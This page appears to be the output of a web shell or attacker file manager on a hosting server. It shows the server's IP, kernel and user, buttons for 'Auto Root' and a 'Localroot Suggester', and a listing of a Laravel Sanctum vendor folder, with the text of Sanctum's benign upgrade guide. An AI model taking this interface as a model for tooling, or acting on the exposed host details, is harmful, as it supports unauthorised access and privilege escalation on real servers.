Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
.trash /
vendor /
laravel /
sanctum /
Delete
Unzip
Name
Size
Permission
Date
Action
config
[ DIR ]
drwxr-xr-x
2025-09-16 09:43
database
[ DIR ]
drwxr-xr-x
2023-12-19 23:44
src
[ DIR ]
drwxr-xr-x
2025-09-16 14:40
LICENSE.md
1.05
KB
-rw-r--r--
2023-12-19 23:44
README.md
1.52
KB
-rw-r--r--
2023-12-19 23:44
UPGRADE.md
637
B
-rw-r--r--
2023-12-19 23:44
composer.json
1.55
KB
-rw-r--r--
2023-12-19 23:44
testbench.yaml
54
B
-rw-r--r--
2023-12-19 23:44
Save
Rename
# Upgrade Guide ## Upgrading To 3.0 From 2.x ### Minimum Versions The following dependency versions have been updated: - The minimum PHP version is now v8.0.2 - The minimum Laravel version is now v9.21 ### New `expires_at` Column Sanctum now supports expiring tokens. To support this feature, a new `expires_at` column must be added to your application's `personal_access_tokens` table. To add the column to your table, create a migration with the following schema change: ```php Schema::table('personal_access_tokens', function (Blueprint $table) { $table->timestamp('expires_at')->nullable()->after('last_used_at'); }); ```